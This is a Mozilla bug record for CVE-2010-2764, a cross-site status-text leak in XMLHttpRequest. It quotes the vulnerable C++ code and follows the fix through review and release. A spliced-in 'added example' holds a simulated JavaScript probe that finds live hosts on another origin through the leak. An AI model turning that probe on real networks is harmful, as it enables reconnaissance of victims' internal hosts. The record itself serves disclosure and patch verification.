Closed Bug 552090 (CVE-2010-2764) Opened 14 years ago Closed 14 years ago

XHR Cross Site Status leak from xhr.statusText

Categories

(Core :: DOM: Core & HTML, defect)

defect
Not set
normal

Tracking


RESOLVED FIXED
Tracking Status
blocking2.0 --- final+
blocking1.9.2 --- .9+
status1.9.2 --- .9-fixed
blocking1.9.1 --- .12+
status1.9.1 --- .12-fixed

People

(Reporter: haggardii, Assigned: mrbkap)

Details

(Keywords: verified1.9.1, verified1.9.2, Whiteboard: [sg:low])

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8

content/base/src/nsXMLHttpRequest.cpp

GetStatus() checks for a leak of status information from denied cross-site requests, but GetStatusText() does not.

nsXMLHttpRequest::GetStatus(PRUint32 *aStatus)
{
  *aStatus = 0;

  if (mState & XML_HTTP_REQUEST_USE_XSITE_AC) {
    // Make sure we don't leak status information from denied cross-site
    // requests.
    if (mChannel) {
      nsresult status;
      mChannel->GetStatus(&status);
      if (NS_FAILED(status)) {
        return NS_OK;
      }
    }
  }

  // ... (remainder of GetStatus() not quoted in the report)
}

nsXMLHttpRequest::GetStatusText(nsACString& aStatusText)
{
  nsCOMPtr<nsIHttpChannel> httpChannel = GetCurrentHttpChannel();

  aStatusText.Truncate();

  nsresult rv = NS_OK;

  if (httpChannel) {
    rv = httpChannel->GetResponseStatusText(aStatusText);
  }

  return rv;
}

Reproducible: Always
Status: UNCONFIRMED → NEW
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
Component: Security → DOM
Ever confirmed: true
Product: Firefox → Core
QA Contact: firefox → general
Whiteboard: [sg:high]
Attached patch: Fix
The fix here is pretty trivial. sicking asked me to not throw if we didn't have an http channel because we currently don't throw at all in that case.
Assignee: nobody → mrbkap
Status: NEW → ASSIGNED
Attachment #432251 - Flags: superreview?(jst)
Attachment #432251 - Flags: review?(jonas)
Attachment #432251 - Flags: superreview?(jst) → superreview+
This should block the next branch release - please request patch approval once it's baked.
blocking1.9.2: ? → needed
http://hg.mozilla.org/mozilla-central/rev/637a23219852

I'm also lowering the severity of this. The statusText field only exposes whether or not a server exists, and there exist timing-based attacks to expose the same information.

dveditz, bsterne, please tell me if I'm off base here.
Status: ASSIGNED → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Whiteboard: [sg:high] → [sg:low]
blocking1.9.1: ? → needed
This issue was separately reported to security@ by Nicholas B. <nberthaume@gmail.com>.

Nominating for branches.
blocking1.9.1: needed → ?
blocking1.9.2: needed → ?
OS: Mac OS X → All
Hardware: x86 → All
Attachment #432251 - Flags: approval1.9.2.8?
Attachment #432251 - Flags: approval1.9.1.12?
> The statusText field only exposes whether or not a server exists

Not quite; it can expose some details of the server's setup too.
blocking1.9.1: ? → .12+
blocking1.9.2: ? → .8+
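The leak described in the report, and the impact discussed in the severity comments above (a cross-site caller learning that a server exists, and possibly something about its setup, from the reason phrase alone), as an added example. This is not code from the bug or from Mozilla's tree: the host table and FakeXMLHttpRequest are constructed stand-ins that model the pre-fix and post-fix behaviour of a denied cross-site request so the probe can run offline; in a browser the same probeHosts() would be handed window.XMLHttpRequest instead.

```javascript
// Added example, not code from the bug report or from Mozilla's tree.
// For a cross-site XMLHttpRequest that fails the access-control check,
// GetStatus() reported 0 but the unpatched GetStatusText() still copied the
// HTTP channel's reason phrase. A page on one origin could therefore tell
// which hosts on another origin answer HTTP at all, and the reason phrase
// ("Unauthorized", "Service Unavailable", ...) hints at what is running there.

// Constructed sample data: hosts that exist and the reason phrase their server
// would send. Hosts absent from the table behave like "connection refused",
// i.e. there is no HTTP channel and no reason phrase at all.
const SAMPLE_SERVERS = {
  "intranet.example": { statusText: "Unauthorized" },      // portal behind auth
  "printer.example":  { statusText: "OK" },
  "devbox.example":   { statusText: "Service Unavailable" },
};

// Simulated Gecko behaviour for a *denied* cross-site request (assumption:
// a minimal model, not the real nsXMLHttpRequest).
// patched=false reproduces the bug; patched=true reproduces the fix, where
// statusText is blanked whenever the cross-site channel carries a failure.
function makeFakeXHR(servers, patched) {
  return class FakeXMLHttpRequest {
    constructor() {
      this.readyState = 0;
      this.status = 0;
      this.statusText = "";
      this.onreadystatechange = null;
    }
    open(method, url) {
      this.url = url;
      this.readyState = 1;
    }
    send() {
      const host = new URL(this.url).host;
      const reply = servers[host];
      // The access-control check fails and the channel is cancelled, so
      // GetStatus() yields 0 in both the vulnerable and the fixed version ...
      this.status = 0;
      // ... but only the patched GetStatusText() hides the reason phrase.
      this.statusText = (!patched && reply) ? reply.statusText : "";
      this.readyState = 4;
      if (this.onreadystatechange) this.onreadystatechange();
    }
  };
}

// Attacker-side probe: one request per candidate host, reading only the two
// fields a denied cross-site request is supposed to leave empty.
function probeHosts(XHRCtor, urls, done) {
  const results = [];
  let pending = urls.length;
  if (pending === 0) { done(results); return; }
  for (const url of urls) {
    const xhr = new XHRCtor();
    xhr.onreadystatechange = () => {
      if (xhr.readyState !== 4) return;
      results.push({
        url,
        status: xhr.status,
        statusText: xhr.statusText,
        // status 0 together with a non-empty reason phrase is exactly the
        // inconsistency this bug is about: denied, yet the text got through.
        leaked: xhr.status === 0 && xhr.statusText !== "",
      });
      if (--pending === 0) done(results);
    };
    xhr.open("GET", url);
    xhr.send();
  }
}

// Which hosts did the probe positively identify as alive?
function aliveHosts(results) {
  return results.filter((r) => r.leaked).map((r) => new URL(r.url).host);
}
```

The check a reviewer wants from the fix is the last property: after the patch, a denied cross-site request must leave status and statusText equally empty, so aliveHosts() on the patched simulation returns nothing, whereas on the unpatched one it names every host that answered HTTP, including the nonexistent host's absence.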
Comment on attachment 432251 [details] [diff] [review]
Fix

Approved for 1.9.2.8 and 1.9.1.12, a=dveditz for release-drivers
Attachment #432251 - Flags: approval1.9.2.8?
Attachment #432251 - Flags: approval1.9.2.8+
Attachment #432251 - Flags: approval1.9.1.12?
Attachment #432251 - Flags: approval1.9.1.12+
Verified for 1.9.1 and 1.9.2 based on updated checked in tests.
Alias: CVE-2010-2764
blocking2.0: ? → final+
Group: core-security
Component: DOM → DOM: Core & HTML